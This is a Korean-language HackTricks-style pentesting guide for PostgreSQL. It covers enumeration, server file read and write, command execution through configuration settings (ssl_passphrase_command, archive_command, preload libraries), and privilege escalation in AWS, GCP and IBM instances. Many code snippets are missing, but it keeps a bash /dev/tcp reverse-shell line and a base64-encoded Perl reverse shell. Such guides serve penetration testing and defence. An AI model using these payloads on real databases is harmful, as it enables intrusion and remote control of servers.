5432,5433 - Pentesting Postgresql
Last updated
Last updated
Trickest를 사용하여 세계에서 가장 진보된 커뮤니티 도구로 구동되는 워크플로우를 쉽게 구축하고 자동화하세요. 오늘 바로 접근하세요:
PostgreSQL은 오픈 소스인 객체 관계형 데이터베이스 시스템으로 설명됩니다. 이 시스템은 SQL 언어를 활용할 뿐만 아니라 추가 기능으로 이를 향상시킵니다. 다양한 데이터 유형과 작업을 처리할 수 있는 능력 덕분에 개발자와 조직에게 다재다능한 선택이 됩니다.
기본 포트: 5432이며, 이 포트가 이미 사용 중인 경우 postgresql은 사용되지 않는 다음 포트(아마도 5433)를 사용할 것으로 보입니다.
**\list**를 실행했을 때 **rdsadmin**이라는 데이터베이스가 발견되면, 당신은 AWS postgresql 데이터베이스 안에 있다는 것을 알 수 있습니다.
PostgreSQL 데이터베이스를 악용하는 방법에 대한 더 많은 정보는 다음을 확인하세요:
PostgreSQL injection이 연구에 따르면, 연결 시도가 실패하면 dblink는 오류에 대한 설명을 포함한 sqlclient_unable_to_establish_sqlconnection 예외를 발생시킵니다. 이러한 세부 사항의 예는 아래에 나열되어 있습니다.
호스트가 다운됨
DETAIL: 서버에 연결할 수 없습니다: 호스트에 대한 경로가 없습니다. "1.2.3.4"에서 서버가 실행 중이며 포트 5678에서 TCP/IP 연결을 수락하고 있습니까?
포트가 닫혀 있음
포트가 열려 있습니다
or
포트가 열려 있거나 필터링됨
In PL/pgSQL 함수에서는 현재 예외 세부정보를 얻는 것이 불가능합니다. 그러나 PostgreSQL 서버에 직접 접근할 수 있다면 필요한 정보를 검색할 수 있습니다. 시스템 테이블에서 사용자 이름과 비밀번호를 추출하는 것이 불가능하다면, 앞서 논의된 단어 목록 공격 방법을 활용하는 것을 고려할 수 있습니다. 이는 긍정적인 결과를 가져올 수 있습니다.
| 역할 유형 | |
|---|---|
rolsuper | 역할은 슈퍼유저 권한을 가집니다. |
rolinherit | 역할은 자신이 속한 역할의 권한을 자동으로 상속받습니다. |
rolcreaterole | 역할은 더 많은 역할을 생성할 수 있습니다. |
rolcreatedb | 역할은 데이터베이스를 생성할 수 있습니다. |
rolcanlogin | 역할은 로그인할 수 있습니다. 즉, 이 역할은 초기 세션 인증 식별자로 사용될 수 있습니다. |
rolreplication | 역할은 복제 역할입니다. 복제 역할은 복제 연결을 시작하고 복제 슬롯을 생성 및 삭제할 수 있습니다. |
rolconnlimit | 로그인할 수 있는 역할의 경우, 이 역할이 만들 수 있는 최대 동시 연결 수를 설정합니다. -1은 제한이 없음을 의미합니다. |
rolpassword | 비밀번호가 아닙니다 (항상 |
rolvaliduntil | 비밀번호 만료 시간 (비밀번호 인증에만 사용됨); 만료가 없으면 null입니다. |
rolbypassrls | 역할은 모든 행 수준 보안 정책을 우회합니다. 자세한 내용은 섹션 5.8를 참조하십시오. |
rolconfig | 실행 시간 구성 변수에 대한 역할별 기본값 |
oid | 역할의 ID |
**pg_execute_server_program**의 구성원인 경우 프로그램을 실행할 수 있습니다.
**pg_read_server_files**의 구성원인 경우 파일을 읽을 수 있습니다.
**pg_write_server_files**의 구성원인 경우 파일을 쓸 수 있습니다.
Postgres에서 사용자, 그룹 및 역할은 같습니다. 이는 사용하는 방법과 로그인 허용 여부에 따라 다릅니다.
이 커밋 에서 정의된 DEFAULT_ROLE_READ_SERVER_FILES 그룹의 구성원( **pg_read_server_files**라고 불림)과 슈퍼 유저는 모든 경로에서 COPY 방법을 사용할 수 있습니다( genfile.c의 convert_and_check_filename을 확인하세요):
다른 postgres 함수가 있어 파일을 읽거나 디렉토리를 나열하는 데 사용할 수 있습니다. 오직 슈퍼유저와 명시적 권한이 있는 사용자만 사용할 수 있습니다:
You can find more functions in https://www.postgresql.org/docs/current/functions-admin.html
오직 슈퍼 유저와 **pg_write_server_files**의 구성원만이 copy를 사용하여 파일을 쓸 수 있습니다.
COPY는 줄 바꿈 문자를 처리할 수 없으므로, base64 페이로드를 사용하더라도 한 줄로 전송해야 합니다.
이 기술의 매우 중요한 제한 사항은 copy가 이진 파일을 쓰는 데 사용할 수 없다는 것입니다. 이진 값이 수정되기 때문입니다.
그러나 큰 이진 파일을 업로드하는 다른 기술이 있습니다:
Big Binary Files Upload (PostgreSQL)버그 바운티 팁: Intigriti에 가입하세요, 해커를 위해 해커가 만든 프리미엄 버그 바운티 플랫폼입니다! 오늘 https://go.intigriti.com/hacktricks에서 저희와 함께하고 최대 $100,000의 보상을 받기 시작하세요!
PostgreSQL 서버 파일을 읽고 쓸 수 있는 권한이 있다면, PostgreSQL 데이터 디렉토리에서 연관된 파일 노드를 덮어쓰는 방식으로 서버의 모든 테이블을 업데이트할 수 있습니다. 이 기술에 대한 자세한 내용은 여기에서 확인하세요.
필요한 단계:
PostgreSQL 데이터 디렉토리 가져오기
참고: 설정에서 현재 데이터 디렉토리 경로를 가져올 수 없는 경우, SELECT version() 쿼리를 통해 주요 PostgreSQL 버전을 조회하고 경로를 무작위로 추측해 보세요. Unix 설치의 PostgreSQL에서 일반적인 데이터 디렉토리 경로는 /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/입니다. 일반적인 클러스터 이름은 main입니다. 2. 대상 테이블과 연관된 파일 노드의 상대 경로 가져오기
이 쿼리는 base/3/1337과 같은 결과를 반환해야 합니다. 디스크의 전체 경로는 $DATA_DIRECTORY/base/3/1337, 즉 /var/lib/postgresql/13/main/base/3/1337입니다. 3. lo_* 함수를 통해 파일 노드 다운로드
대상 테이블과 연관된 데이터 유형 가져오기
PostgreSQL 파일 노드 편집기를 사용하여 파일 노드 편집; 모든 rol* 불리언 플래그를 1로 설정하여 전체 권한을 부여합니다.
6. 수정된 파일 노드를 lo_* 함수를 통해 다시 업로드하고 디스크의 원본 파일을 덮어씁니다.
(선택 사항) 비싼 SQL 쿼리를 실행하여 메모리 내 테이블 캐시를 지웁니다.
이제 PostgreSQL에서 업데이트된 테이블 값을 확인할 수 있습니다.
pg_authid 테이블을 편집하여 슈퍼관리자가 될 수도 있습니다. 자세한 내용은 다음 섹션을 참조하세요.
버전 9.3부터는 슈퍼 사용자와 pg_execute_server_program 그룹의 구성원만 RCE를 위해 copy를 사용할 수 있습니다 (유출 예시:
예제 실행:
또는 metasploit의 multi/postgres/postgres_copy_from_program_cmd_exec 모듈을 사용할 수 있습니다.
이 취약점에 대한 더 많은 정보는 여기에서 확인할 수 있습니다. CVE-2019-9193으로 보고되었지만, Postges는 이것이 기능이며 수정되지 않을 것이라고 선언했습니다.
이전 게시물에서 이진 파일을 업로드하는 방법을 배운 후, PostgreSQL 확장을 업로드하고 로드하여 RCE를 얻으려고 시도할 수 있습니다.
RCE with PostgreSQL Extensions다음 RCE 벡터는 모든 단계가 중첩된 SELECT 문을 통해 수행될 수 있으므로 제한된 SQLi 컨텍스트에서 특히 유용합니다.
PostgreSQL의 구성 파일은 postgres 사용자에 의해 쓰기 가능합니다. 이 사용자는 데이터베이스를 실행하는 사용자이므로 슈퍼유저로서 파일 시스템에 파일을 쓸 수 있으며, 따라서 이 파일을 덮어쓸 수 있습니다.
이 기술에 대한 더 많은 정보는 여기에서 확인할 수 있습니다.
구성 파일에는 RCE로 이어질 수 있는 몇 가지 흥미로운 속성이 있습니다:
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key' 데이터베이스의 개인 키 경로
ssl_passphrase_command = '' 개인 파일이 비밀번호로 보호되어 있는 경우 (암호화됨) PostgreSQL은 이 속성에 지정된 명령을 실행합니다.
ssl_passphrase_command_supports_reload = off 이 속성이 켜져 있으면 비밀번호로 보호된 키가 있을 경우 실행된 명령이 pg_reload_conf()가 실행될 때 실행됩니다.
그런 다음 공격자는 다음을 수행해야 합니다:
서버에서 개인 키 덤프
다운로드한 개인 키를 암호화:
rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
덮어쓰기
현재 PostgreSQL 구성 덤프
언급된 속성 구성으로 구성을 덮어쓰기:
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
pg_reload_conf() 실행
테스트하는 동안 개인 키 파일의 권한이 640이어야 하며, root가 소유하고 ssl-cert 또는 postgres 그룹에 속해야 (postgres 사용자가 읽을 수 있도록) 하며, _/var/lib/postgresql/12/main_에 위치해야 한다는 것을 알게 되었습니다.
이 구성 및 WAL에 대한 더 많은 정보는 여기 에서 확인할 수 있습니다.
구성 파일에서 악용할 수 있는 또 다른 속성은 archive_command입니다.
이 작업이 수행되려면 archive_mode 설정이 'on' 또는 'always'여야 합니다. 그렇다면 archive_command의 명령을 덮어쓰고 WAL(쓰기 앞서 기록) 작업을 통해 실행하도록 강제할 수 있습니다.
일반적인 단계는 다음과 같습니다:
아카이브 모드가 활성화되어 있는지 확인: SELECT current_setting('archive_mode')
페이로드로 archive_command 덮어쓰기. 예를 들어, 리버스 셸: archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'
구성 다시 로드: SELECT pg_reload_conf()
WAL 작업을 강제로 실행하여 아카이브 명령을 호출: SELECT pg_switch_wal() 또는 일부 PostgreSQL 버전의 경우 SELECT pg_switch_xlog()
이 기술에 대한 더 많은 정보는 여기에서 확인할 수 있습니다.
이 공격 벡터는 다음 구성 변수를 이용합니다:
session_preload_libraries -- 클라이언트 연결 시 PostgreSQL 서버가 로드할 라이브러리.
dynamic_library_path -- PostgreSQL 서버가 라이브러리를 검색할 디렉토리 목록.
dynamic_library_path 값을 데이터베이스를 실행하는 postgres 사용자가 쓸 수 있는 디렉토리, 예를 들어 /tmp/ 디렉토리로 설정하고, 그곳에 악성 .so 객체를 업로드할 수 있습니다. 다음으로, session_preload_libraries 변수에 새로 업로드한 라이브러리를 포함시켜 PostgreSQL 서버가 이를 로드하도록 강제합니다.
공격 단계는 다음과 같습니다:
원본 postgresql.conf 다운로드
dynamic_library_path 값에 /tmp/ 디렉토리 포함, 예: dynamic_library_path = '/tmp:$libdir'
session_preload_libraries 값에 악성 라이브러리 이름 포함, 예: session_preload_libraries = 'payload.so'
SELECT version() 쿼리를 통해 주요 PostgreSQL 버전 확인
올바른 PostgreSQL 개발 패키지로 악성 라이브러리 코드 컴파일 샘플 코드:
코드 컴파일:
2-3단계에서 생성된 악성 postgresql.conf를 업로드하고 원본 파일을 덮어쓰기
5단계에서 /tmp 디렉토리에 payload.so 업로드
서버를 재시작하거나 SELECT pg_reload_conf() 쿼리를 호출하여 서버 구성 다시 로드
다음 DB 연결 시 리버스 셸 연결을 받을 수 있습니다.
문서에 따르면: CREATEROLE 권한이 있는 역할은 슈퍼유저가 아닌 모든 역할에 대한 멤버십을 부여하거나 철회할 수 있습니다.
따라서 CREATEROLE 권한이 있는 경우, 다른 역할(슈퍼유저가 아닌)에 대한 접근 권한을 부여하여 파일을 읽고 쓸 수 있는 옵션과 명령을 실행할 수 있습니다:
이 역할을 가진 사용자는 다른 비슈퍼유저의 비밀번호를 변경할 수 있습니다:
로컬 사용자가 비밀번호 없이 PostgreSQL에 로그인할 수 있는 경우가 많습니다. 따라서, 코드를 실행할 수 있는 권한을 얻은 후 이러한 권한을 악용하여 SUPERUSER 역할을 부여받을 수 있습니다:
이것은 일반적으로 pg_hba.conf 파일의 다음 줄들 때문에 가능합니다:
이 글에서는 사용자가 부여받은 ALTER TABLE 권한을 악용하여 Postgres GCP에서 privesc가 가능했던 방법을 설명합니다.
다른 사용자를 테이블의 소유자로 만들려고 할 때 오류가 발생해야 하지만, GCP는 슈퍼유저가 아닌 postgres 사용자에게 그 옵션을 제공한 것 같습니다:
이 아이디어와 함께 INSERT/UPDATE/ANALYZE 명령이 인덱스 함수가 있는 테이블에서 실행될 때, 함수가 테이블 소유자의 권한으로 명령의 일부로 호출된다는 사실을 결합하면, 함수를 사용하여 인덱스를 생성하고 해당 테이블에 대해 슈퍼유저에게 소유자 권한을 부여한 다음, 악의적인 함수를 사용하여 테이블에서 ANALYZE를 실행할 수 있습니다. 이 함수는 소유자의 권한을 사용하기 때문에 명령을 실행할 수 있습니다.
새 테이블을 생성합니다.
인덱스 함수에 데이터를 제공하기 위해 테이블에 관련 없는 내용을 삽입합니다.
코드 실행 페이로드를 포함하는 악성 인덱스 함수를 개발하여 무단 명령이 실행될 수 있도록 합니다.
테이블의 소유자를 "cloudsqladmin"으로 ALTER합니다. 이는 Cloud SQL이 데이터베이스를 관리하고 유지하는 데 독점적으로 사용되는 GCP의 슈퍼유저 역할입니다.
테이블에 대해 ANALYZE 작업을 수행합니다. 이 작업은 PostgreSQL 엔진이 테이블 소유자의 사용자 컨텍스트인 "cloudsqladmin"으로 전환하도록 강제합니다. 결과적으로, 악성 인덱스 함수가 "cloudsqladmin"의 권한으로 호출되어 이전에 무단으로 실행된 셸 명령이 실행될 수 있게 됩니다.
PostgreSQL에서 이 흐름은 다음과 같습니다:
그럼 shell_commands_results 테이블은 실행된 코드의 출력을 포함하게 됩니다:
일부 잘못 구성된 postgresql 인스턴스는 모든 로컬 사용자의 로그인을 허용할 수 있으며, dblink function을 사용하여 127.0.0.1에서 로컬로 로그인하는 것이 가능합니다:
이전 쿼리가 작동하려면 함수 dblink가 존재해야 합니다. 존재하지 않는 경우 다음을 사용하여 생성해 볼 수 있습니다.
더 높은 권한을 가진 사용자의 비밀번호가 있지만, 해당 사용자가 외부 IP에서 로그인할 수 없는 경우, 다음 함수를 사용하여 해당 사용자로서 쿼리를 실행할 수 있습니다:
이 함수가 존재하는지 확인할 수 있습니다:
이 글에서, pentesters는 IBM이 제공하는 postgres 인스턴스 내에서 privesc를 할 수 있었는데, 그 이유는 SECURITY DEFINER 플래그가 있는 이 함수를 발견했기 때문입니다:
문서에서 설명된 바와 같이, SECURITY DEFINER가 있는 함수는 소유자의 권한으로 실행됩니다. 따라서, 함수가 **SQL Injection에 취약하거나 공격자가 제어하는 매개변수로 일부 특권 작업을 수행하는 경우, 이를 악용하여 postgres 내에서 권한을 상승시킬 수 있습니다.
이전 코드의 4번째 줄에서 함수가 SECURITY DEFINER 플래그를 가지고 있는 것을 볼 수 있습니다.
그리고 명령어를 실행합니다:
PL/pgSQL은 SQL에 비해 더 큰 절차적 제어를 제공하는 완전한 기능의 프로그래밍 언어입니다. 이는 루프 및 기타 제어 구조를 사용하여 프로그램 논리를 향상시킬 수 있게 해줍니다. 또한, SQL 문 및 트리거는 PL/pgSQL 언어를 사용하여 생성된 함수를 호출할 수 있는 기능을 가지고 있습니다. 이 통합은 데이터베이스 프로그래밍 및 자동화에 대해 더 포괄적이고 다재다능한 접근 방식을 허용합니다. 이 언어를 악용하여 PostgreSQL에 사용자 자격 증명을 브루트포스하도록 요청할 수 있습니다.
PL/pgSQL Password Bruteforce다음 권한 상승 벡터는 모든 단계가 중첩된 SELECT 문을 통해 수행될 수 있으므로 제한된 SQLi 컨텍스트에서 특히 유용합니다.
PostgreSQL 서버 파일을 읽고 쓸 수 있다면, 내부 pg_authid 테이블과 관련된 PostgreSQL 디스크 상의 파일 노드를 덮어써서 슈퍼유저가 될 수 있습니다.
이 기술에 대해 더 읽어보려면 여기를 클릭하세요.**
공격 단계는 다음과 같습니다:
PostgreSQL 데이터 디렉토리를 얻습니다.
pg_authid 테이블과 관련된 파일 노드에 대한 상대 경로를 얻습니다.
lo_* 함수를 통해 파일 노드를 다운로드합니다.
pg_authid 테이블과 관련된 데이터 유형을 가져옵니다.
PostgreSQL Filenode Editor를 사용하여 파일 노드를 편집합니다; 모든 rol* 불리언 플래그를 1로 설정하여 전체 권한을 부여합니다.
lo_* 함수를 통해 편집된 파일 노드를 다시 업로드하고, 디스크의 원본 파일을 덮어씁니다.
(선택 사항) 비싼 SQL 쿼리를 실행하여 메모리 내 테이블 캐시를 지웁니다.
이제 전체 슈퍼관리자의 권한을 가질 수 있습니다.
inside the postgresql.conf 파일에서 다음을 변경하여 postgresql 로그를 활성화할 수 있습니다:
그런 다음, 서비스를 재시작합니다.
pgadmin은 PostgreSQL을 위한 관리 및 개발 플랫폼입니다. pgadmin4.db 파일 안에서 비밀번호를 찾을 수 있습니다. 스크립트 안의 decrypt 함수를 사용하여 이를 복호화할 수 있습니다: https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py
PostgreSQL에서 클라이언트 인증은 pg_hba.conf라는 구성 파일을 통해 관리됩니다. 이 파일은 각 연결 유형, 클라이언트 IP 주소 범위(해당되는 경우), 데이터베이스 이름, 사용자 이름 및 일치하는 연결에 사용할 인증 방법을 지정하는 일련의 레코드를 포함합니다. 연결 유형, 클라이언트 주소, 요청된 데이터베이스 및 사용자 이름과 일치하는 첫 번째 레코드가 인증에 사용됩니다. 인증이 실패할 경우 대체나 백업이 없습니다. 일치하는 레코드가 없으면 접근이 거부됩니다.
pg_hba.conf에서 사용할 수 있는 비밀번호 기반 인증 방법은 md5, crypt, 및 password입니다. 이 방법들은 비밀번호가 전송되는 방식에서 차이가 있습니다: MD5 해시, crypt 암호화 또는 일반 텍스트. crypt 방법은 pg_authid에서 암호화된 비밀번호와 함께 사용할 수 없다는 점에 유의해야 합니다.
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE) GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
